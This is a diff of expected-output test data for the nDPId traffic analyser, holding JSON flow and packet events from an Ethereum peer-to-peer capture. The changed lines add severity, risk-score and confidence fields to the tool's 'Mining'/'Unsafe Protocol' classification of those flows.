 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -180,29 +180,29 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHKIQAAEAR+iHAqAG4QipS9nZfdl8As8h52l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -211,23 +211,23 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
